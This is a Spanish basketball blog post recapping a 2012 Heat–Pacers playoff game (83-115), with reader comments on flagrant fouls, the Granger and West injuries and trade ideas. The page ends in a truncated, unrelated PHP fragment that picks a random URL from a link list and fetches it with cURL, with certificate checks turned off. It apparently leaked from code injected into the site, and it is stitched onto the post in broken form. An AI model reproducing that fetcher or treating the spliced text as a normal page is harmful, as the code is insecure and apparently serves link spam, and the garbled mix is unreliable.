La Crónica: La madre de todas las batallas

23 de May de 2012 por txusma

Los Heat dieron anoche todo un golpe de autoridad sobre la mesa y lo hicieron en un partido muy físico y muy duro (83-115). Hasta 3 faltas flagrantes se pitaron durante el partido, a cada cual más dura (tenéis los enlaces en el twitter). Empezó Hansbrough repartiendo estopa y Haslem se la devolvió prácticamente a la jugada siguiente. El partido continuó por esos derroteros hasta la media parte, a la que Miami llegó con 7 puntos de ventaja.

Al inicio del tercer cuarto llegó la jugada que decidió el partido, y vete a saber tú si la eliminatoria: Danny Granger tropieza con LeBron y se tuerce el tobillo. Se retira al vestuario y ya no puede volver a pista. A partir de ahí, los Heat anotarían 21 puntos más que los Pacers y finiquitarían el partido. Por si no fueran suficientes desgracias, David West acaba el tercer cuarto también lesionado y ya no disputa el último período. Demasiado fácil para LeBron, Wade y compañía, que se permitieron el lujo incluso de descansar. De todas maneras, para que no se diga, en los últimos segundos Dexter Pittman le propinó un codazo a Lance Stephenson al más puro estilo ex-Ron Artest. Creo que se la tenían guardada por unos gestos que hizo el jugador de los Pacers en el tercer partido. Aquí no olvida nadie.

PREMIOS

MVP: Esta vez LeBron James y Dwyane Wade fueron demasiado para los Pacers. El primero pasó una vez de los 30 puntos en Playoffs y además consiguió 10 rebotes y 8 asistencias. El segundo anotó 28 puntos.

Sorpresa: 17 minutos de calidad para Udonis Haslem. 10 puntitos y 6 rebotes para la saca.

Decepción: Sin George Hill los Pacers no tienen nada que hacer y el ex de los Spurs lleva un par de partidos sin aparecer. Ayer se quedó en 6 puntos y 1 asistencia.

Esfuerzo en vano: Mal día para los Pacers. Imposible quedarse con un nombre.

Imágenes | AP Photos / Getty Images

Comenta

21 comentarios a esta entrada

  1. TheDeerHunter dice:
    #1

    “I can’t believe my team went soft,” Bird told the Indianapolis Star after the game. “S-O-F-T. I’m disappointed. I never thought it would have happened.”

    ¿A Bird también le vas a llamar radical, Sancho? 😀

      Citar

  2. nba dice:
    #2

    El partido de esta noche es , como si nos imaginasemos un Lakers-OKC , en el que los Lakers les ganan de 30 a Thunder,
    pero que ha pasado con Indiana, que era un equipo solvente para recibir esta paliza

      Citar

  3. GreenPride dice:
    #3

    Repaso de los Heat a los Pacers que además quedan con dos jugadores fundamentales lesionados o tocados como Granger y West. No creo que el partido lo decidiera la lesión de Granger pues ya para ese momento los Heat estaban claramente por delante pero sí que su lesión puede decidir la eliminatoria si no puede jugar el resto.
    Los Heat salieron muy enchufados y a parte de LeBron&Wade encontraron la aportación de otros en ataque como Battier con varios triples, Chalmers, Haslem e incluso Turiaf.
    Los Pacers estuvieron como dice en gran Bird “soft”. ¡Quién mejor que él para decirlo! Su plan de partido pasaba por poder hacer valer su superioridad en la pintura pero muy lejos de ello fueron incapaces de dar balones en condiciones a West y Hibbert que prácticamente no tuvieron influencia en su ataque. Una gran cantidad de malos pases que por supuesto no desaprovecharon los Heat que cosieron a contraataques a los de Indiana.
    De nuevo partidazo del Rey que está demostrando haber madurado bastante en su juego y está llevando clarísimamente el peso de su equipo. A su lado el escudero Wade parece haber recupera buena parte de su juego en estos dos últimos partidos aunque sigue asombrando sus dificultades para meter puntos fuera de la zona, incluso fallando muchísimos tiros libres.
    Ahora vuelta a Indiana donde los Pacers buscarán recobrar fuerzas y a los tocados Granger y West e imponer su estilo en el 6º. Yo creo que la eliminatoria se les escapó en el 4º y que aunque consiguieran ganar el 6º (cosa que no veo clara) no les veo capaces de ganar el 7º en Miami.

      Citar

  4. HisRoyalAirness dice:
    #4

    Me parece vomitivo, Haslem tendría que haberse ido a la calle en el primer cuarto; lo que hizo es una flagrant 2 como una casa. Espero que lo suspendan a posteriori.
    Los secretos de la derrota de Pacers? Lesión de Granger y West, no hay más.
    Ah, y si tienes un pivot All-Star de 2´20 y Mario Chalmers te coge 11 rebotes es que tienes que mirártelo. Totalmente de acuerdo con Larry.

      Citar

  5. Esteban dice:
    #5

    los pacers se equivocan, si bien tienen superioridad en la pintura, sobretodo con west sobre battier, no es tanta

    si a west lo marca haslem, es un duelo en otro momento medio igualado
    y hibbert si bien en bueno en ataque, no es una referencia, gana si, pero con fuerza turiaf puede hasta taparlo

    los pacers deberian buscar variantes y usar a sus internos menos, sobretodo a hibbert, que sea mas alto que los pivots del heat no lo transforman de la noche a la mañana an jabbar, wilt o shaq

    creo que desde el 2-1 en la serie indana no se relajo pero dejo de jugarse la vida en cada bola mientras que el heat si lo hace, con un esfuerzo admirable para los rebotes, y un compromisto total de todos sus integrantes

    pareceria ironico, pero estos pacers, con WADE por GRANGER, serian campeones de la nba, les falta un escolta capaz de generarse su tiro cuando el equipo se estanca, nada mas que eso, y son completisimos, pero no lo tienen, y barbosa ya no es lo q era

      Citar

  6. rumbero dice:
    #6

    Yo creo que mas que un escolta les falta un base de los buenos. Hill y Collison están bien como bases suplentes, pero en este tipo de partidos se echa un falta alguien capaz de generar algo más de juego o aportar con puntos. Un Deron por ejemplo…

      Citar

  7. Esteban dice:
    #7

    rumbero:
    Yo creo que mas que un escolta les falta un base de los buenos. Hill y Collison están bien como bases suplentes, pero en este tipo de partidos se echa un falta alguien capaz de generar algo más de juego o aportar con puntos. Un Deron por ejemplo…

    bue con deron serian la leche, pero les sigue faltando un escolta tirador de verdadero nivel

    granger por evans? seria una apuesta ya que evans viene en caida desde su año rookie, pero no hay muchos escoltad libres y no creo que tengan suficiente espacio para fichar a eric gordon en agencia libre y no creo que NOH acepte a granger por el

      Citar

  8. Ru dice:
    #8

    Empiezo por…por ser de un equipo soy de los Heat por LeBron,que es mi jugador preferido junto con Love.Dicho esto espero que le caiga la del pulpo a Pittman y se pierda todos los PO’s.Para Haslem también tengo y si bien no considero su acción de la misma gravedad que la de Pittman,aplicando el reglamento debería haber sido expulsado.

    Tras esto,muchísimo LeBron y mucho Wade,y con eso un poquito que les acompañe ya basta.Indiana ha tirado por la borda una oportunidad única y es que en el momento de la verdad han estado como dice Bird,muy blandos.Sin embargo no sé decir dónde está el nivel,ya que mi impresión es que mantienen el mismo listón siempre y hacen lo que les dejan Miami.Si Miami juega como el culo Indiana gana,si Miami juega bien,Indiana pierde.Así que la serie es lo que quieran los Heat.Huele a 4-2.

    Steve Nash es lo que le falta a Indiana,con eso y mucho trabajo en hacer que Hibbert sea una fuerza decisiva tendrían muchísimo ganado.

    Por su parte y aprovechando los dos buenos partidos de Wade para que no se me tache de oportunista.Este es el nivel que debería ofrecer el 90 % de las veces.Desde que irrumpió en la liga hasta cuando ganó el anillo todo el mundo pensaba que marcaría una época,se le llegaba a comparar con Jordan (hoy día Wade y Jordan en la misma frase ya no se ve tanto) pero entre lesiones y otros factores que no alcanzo a comprender,veo a Wade con poca hambre y esto es desde hace algún tiempo.Curioso que justo después de la bronca con Spoelstra ha sacado todo su orgullo.Yo traspasaría a Wade por un tirador y un pívot de los buenos,aunque gane Miami el título.Tacharme de loco si queréis xDDD

      Citar

  9. Melo15 dice:
    #9

    Pues creo que Indiana precisamente tien bastante espacio salarial, aunque si hay que renovar a Hibbert…
    Pero es casi seguro que si pueden ficharan a Eric Gordon, es nativo de Indiana, de hecho jugo en los Hoosiers de Indiana.

      Citar

  10. Sancho88 dice:
    #10

    Precisamente, eso se está comentando, que quizá busquen reforzarse con Gordon, que es capaz de generarse sus propios tiros, y busquen un trade por Granger. El que comenta Esteban por Tyreke creo que tendría bastante sentido, porque a los Pacers les vendría muy bien un tipo más completo en todas las facetas del juego que Granger, y a pesar de ser un pésimo tirador desde lejana distancia y un mediocre tirador de media distancia, estoy convencido de que tiene que evolucionar y lo hará. Un combo que puede jugar en tres posiciones sería de gran valor para estos Pacers.

    Por su parte, Sacramento obtendría la pieza que no tiene, un alero alto tirador, aunque juntando a Thornton y Granger… la defensa vuelve a estar bajo serias sospechas.

    Por otra parte, leo entre líneas las declaraciones de Bird y en su cabeza debe pensar… si me llega a tocar esta eliminatoria cuando aún jugaba yo… se iban a enterar estos flipados como Pittman. Al codazo que mete le meto yo el puño por el esófago…

    Lamentable lo que han hecho hoy los Heat en ese juego sucio que no han querido sancionar. Espero que la NBA sancione a posteriori porque tanto Haslem como Pittman se les ha ido la olla. Criticamos mucho a Artest, pero lo de Pittman es de juicio sumarísimo… que payaso. Aunque como se suele decir, de aquellos polvos vienen ahora estos lodos. Efectivamente, esta batalla la comenzó Frank Vogel diciendo que se tiraban los jugadores de Heat, luego en la eliminatoria ha habido serios enfrentamientos, y el primero que ‘araña’ anoche fue Hansbrough… así que todos son culpables de lo que pasó, y sobre todo los árbitros por no pararlo con flagrantes tipos 2. Menudos cobardes…

    En lo que respecta al partido, creo que ya ha quedado todo dicho por aquí. Solo añadir que los Heat completaron su mejor partido en Playoffs en cuanto a efectividad en tiros a canasta (61%), y lo que comentáis vosotros, que la baja de Granger marcó el partido totalmente, y luego la lesión de rodilla de West al hacer falta sobre Lebron. Menudo bestia, que encima de recibir la falta, el otro sale despedido al suelo del golpe que se mete contra el cuerpo de James y al caer es cuando se lesiona, probablemente…

    Esto huele a 4-2 seguro. Wade ha resucitado después del tercer partido y a los Pacers no les queda nada que hacer, aún menos sin dos de sus puntales: Granger y West, aunque espero que no sea muy grave y puedan volver para el 6º… lo dudo.

    Y un último apunte también. Se ve que si los Heat juegan su juego, de presión en línea de pase, o sacan a los pívots rivales de la pintura, etc. tienen más opciones de robar y salir corriendo, o coger rebote fácil y armar una transición relámpago con Wade o Lebron como ejecutores. Esto les permite jugar canastas sencillas, lo que explica el dato de los tiros de campo, y también permite que se puedan doblar balones para canastas interiores de Anthony, tiros cómodos de Haslem, o para los triples de Battier, que demostró ayer mucho carácter en los primeros minutos, con una gran exhibición de triples, y desde luego desquició defensivamente a David West, que está lento no, lo siguiente… Siguen sin buscar a Hibbert, y ya mucho me temo que más que por no saber aprovechar la ventaja de centímetros, es porque a este chico le falta algún litro de sangre en las venas… flojito flojito, no impone todo lo que debería en el ataque, debería dominar mucho más

      Citar

  11. Esteban dice:
    #11

    Se equivocan, no solo hay q renovar a hibbert por mas de 10 nill, tamb hay q renovar a hill, y a barbosa o buscar otro escolta de recambio

    Si fichan a gordon entraran en impuesto de lujo de lleno, e indiana es un mercado pequeño por lo q dudo q lo hagan

    La clave seria una trade exeption por granger y alli si todo cuadraria, aunque hay q ver NOH no usa su oferta restringida

    En fin veo difil a gordon en indiana

      Citar

  12. Melo15 dice:
    #12

    Pues yo lo veo tirado, Sign & Trade y listos, Gordon por Granger y hecho, Granger acabaria en un equipo casi recontruido ya que tienen dos rondas altas del Draft y una buena base y Gordon acabaria en el equipo donde quiere acabar, en su casa, jugando de escolta con Paul George de alero, ya tienes escolta atletico, penetrador, y tirador y tambien tienes recambio para Granger.
    Yo tambien traspasaria a Wade, pero tampoco hay muchos pivots rocosos buenos defensores en el mercado.

      Citar

  13. Melo15 dice:
    #13

    Esteban:
    Se equivocan, no solo hay q renovar a hibbert por mas de 10 nill, tamb hay q renovar a hill, y a barbosa o buscar otro escolta de recambio

    Si fichan a gordon entraran en impuesto de lujo de lleno, e indiana es un mercado pequeño por lo q dudo q lo hagan

    La clave seria una trade exeption por granger y alli si todo cuadraria, aunque hay q ver NOH no usa su oferta restringida

    En fin veo difil a gordon en indiana

    A Barbosa no lo renovas.

      Citar

  14. Esteban dice:
    #14

    hibbert pasaras de menos de 3 millones a minimo 10 y quien sabe si mas con los equipos con espacio q hay este año, mientras que hill pasara de 2 a 7 quiza

    para que NOH, decida ujn trade gordon por granger, deben haberlo visto muy mal fisicamente (cosa que no se noto cuando volvio) o que gordon manifiesta un deseo de no jugar alli abiertamente, cosa q no hacen muy seguido los jugadores nba

    ademas pacers deberian competir por el amor de gordon con, por ejemplo, CELTICS, MAVERICKS, NETS

    todos equipos con MAS espacio que los pacers, mercados mas grandes y mas atractivos

    ojo soy de los pacers desde el triple y ful de LARRY JHONSON, pero dudo que consigan a gordon

    por eso derivo las miradas en otros escoltas jovenes y buenos como evans o el propios mayo

      Citar

  15. Esteban dice:
    #15

    Melo15: A Barbosa no lo renovas.

    si no renuevas a barbosa habra q fichar otro escolta y eso tambien cuenta plata

      Citar

  16. Cocinitas dice:
    #16

    Que hubiera sucedido si el trade de Mayo por McRoberts se hubiera llevado a cabo el año pasado??? Ahora tendrían un escolta anotador a un precio asumible. Buscaran un trade por Mayo este verano???

      Citar

  17. Cocinitas dice:
    #17

    Ademas hay una larga lista de escoltas libres este verano aparte de Gordon, como son Ja. Crawford, Jason Terry o Ray Allen.

      Citar

  18. melo15 dice:
    #18

    Ya Esteban pero puestos a perder a Gordon, lo cambias por Granger, y en el Draft te fichas a Bradley Beal, jugador del mismo perfil que Gordon y te fichas a un base o a un pivot.

      Citar

  19. txusma dice:
    #19

    melo15:
    Ya Esteban pero puestos a perder a Gordon, lo cambias por Granger, y en el Draft te fichas a Bradley Beal, jugador del mismo perfil que Gordon y te fichas a un base o a un pivot.

    Pues no suena del todo mal.

      Citar

  20. MagicJohnson32 dice:
    #20

    Por un momento cuando os he leído hablando de Gordon como el jugador que necesitan los Pacers, he pensado que hablabais de Ben Gordon y que os habíais vuelto todos locos 😀

      Citar

  21. Sancho88 dice:
    #21

    jajaja, que grande Magic!! A ver, otra opción que habéis barajado, la de Jamaal Crawford, a mí me cuadraría mucho para estos Pacers. Está claro que les viene bien la “frescura” de Barbosa cuando sale, porque se genera sus propios tiros (eso sí, con una efectividad de mierda, unos porcentajes bajísimos y toda la basura en la que ha ido degenerando este jugador), y un tipo como Crawford les daría un salto de calidad terrible a la hora de asumir responsabilidades y generar juego desde fuera para dividir hacia canasta. Esa tarea la lleva más o menos bien George, pero George no es tan versátil como para ser capaz de tirar desde cualquier posición, así que si renuevan a Granger y se hacen con Crawford este verano, ya tendrían un juego exterior muy guapo, en el que podrían poner a los tres a la vez a jugar inclusive. Lo que está claro es que Indiana necesita decisiones individuales, tipos que asuman liderazgo de grupo, porque el juego colectivo lo tienen bastante bien y el movimiento de balón circula correctamente, aunque en ocasiones circula demasiado correctamente… ya me entendéis, extra pass, extra pass… al final puede ser contraproducente

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>